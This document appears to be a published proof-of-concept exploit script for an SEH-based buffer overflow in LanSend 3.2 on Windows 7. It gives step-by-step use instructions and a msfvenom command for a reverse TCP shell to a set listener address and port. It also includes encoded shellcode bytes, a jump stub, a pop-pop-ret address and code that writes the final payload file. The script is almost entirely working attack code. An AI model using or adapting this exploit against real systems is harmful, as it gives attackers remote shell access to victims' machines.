# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: LanSend 3.2 # Vendor Homepage: https://lizardsystems.com # Version: 3.2 # Software Link: https://lizardsystems.com/download/lansend_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ PoC 1. Run exploit 2. Run Lansend and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00417a47""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41' f.write(payload) f.close()